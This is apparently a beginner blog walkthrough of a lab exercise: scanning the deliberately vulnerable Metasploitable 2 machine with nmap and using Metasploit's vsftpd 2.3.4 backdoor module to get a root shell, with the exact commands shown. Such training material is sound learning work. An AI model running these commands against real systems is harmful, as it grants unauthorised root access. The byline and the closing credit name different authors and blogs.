Exploiting FTP in Metasploitable 2

ABDO HANY
3 min readJul 24, 2023

--

Metasploitable 2

Metasploitable 2 is a deliberately vulnerable linux machine that is meant for beginners to practice their penetration testing skills. The challenges included in implementable are straightforward but also provide you with the basis of hacking.

I’ve decided to start a metasploitable series, where I write short and explanatory articles while exploiting vulnerabilities in the vulnerable machine. The short articles are meat to help beginners to understand the concepts without taking in too much information in a short period of time.

Getting started

I’m going to assume that you have your attack machine(Kai Linux) and target (metasploitable2) set up in your hypervisor and ready to go. I am using VirtualBox.

The first thing that I did was to log in to the metasploitable machine using default credentials(msfadmin:msfadmin) and discover the IP address of the machine. I need this IP address to be able to scan the open ports on the metasploitable machine. To get the IP:

ifconfig

Scanning

The next thing that I did was to scan the target machine from my attack machine. Scanning is the process of discovering the open ports on the target machine and the services running on those ports. This helps to narrow down the attack pattern against that machine. I used nmap for scanning:

nmap -sV -sS -p- -A 192.168.100.13

Let’s break the options down

  • sV: probe open ports to determine service and version information
  • sS: TCP SYN connect
  • -p-: scan all ports
  • A: enable OS detection, version detection, script scanning and traceroute
  • The image above shows the results from the scanning. After you do the scan, you’ll notice that the target machine has a considerable number of open ports, which means there are various attack vectors in this machine.
  • FTP, on port 21, is on top of the list from the scan results. It also shows the version being used, vsftpd 2.3.4. This gave me an idea on enumeration, and I went on to search if there are any known vulnerabilities on that version.

Exploitation

This version of ftp has a malicious backdoor installed on it that grants the attacker root access into the target machine. After reading about the exploit, I went and searched for it in the exploit database.

msfconsole
search vsftpd 2.3.4

The exploit is available in the database, so I can use the exploit to gain access into the target machine.

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.100.13
exploit

After running the exploit, we get a shell inside the target machine. Running whoami shows that I am running as root, hence we have achieved our goal.

And that is how we do a simple ftp exploit on Metasploitable 2. I hope that was understandable, and easy to follow through.

More to come …

This article was originally published on Noob Learning- A blog about my journey in information security, learning through practical examples and hands-on walkthroughs. Sharing what I learn is important because at the end of the day, aren’t we all noobs in something?

https://tsitsiflora.medium.com/exploiting-ftp-in-metasploitable-2-8230a53be5ce

--

--